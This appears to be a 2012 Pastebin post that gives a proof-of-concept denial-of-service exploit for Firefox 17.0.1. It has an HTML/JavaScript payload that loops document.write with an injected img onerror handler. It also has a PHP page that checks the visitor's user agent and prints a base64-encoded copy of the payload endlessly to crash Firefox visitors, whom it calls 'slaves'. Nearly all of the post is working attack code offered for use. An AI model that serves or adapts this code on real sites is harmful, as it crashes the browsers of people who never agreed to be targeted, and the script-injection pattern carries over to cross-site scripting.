Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
- Version : Mozilla Firefox Beta Version and Normal 17.0.1
- Date : 2012-12-06
- Vendor : http://www.mozilla.org
- Impact : Medium
- Contact : sergioyoshiman [at] gmail.com
- Twitter : @sergioyoshiman
- tested : windows XP SP3 & Windows 7 SP1
- Author : Sergio Yoshikata - Lima , Peru
- ==============================================================
- Mozilla Firefox JS POC
- "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
- ==============================================================
- Better way to explote the vulnerability is Using a PHP scripts that check's if slave is using firefox browser them
- print the crash exploit.
- ==============================================================
- <!DOCTYPE html>
- <html>
- <body>
- <?php
- /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
- Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
- $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
- //check if slave is Using Mozilla Firefox
- $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
- if ($firefox)
- {
- //loop forever
- while(1) {
- //print exploit code infinite times.
- print(base64_decode($exploit));
- }
- }
- ?>
- </body>
- </html>
- ==============================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement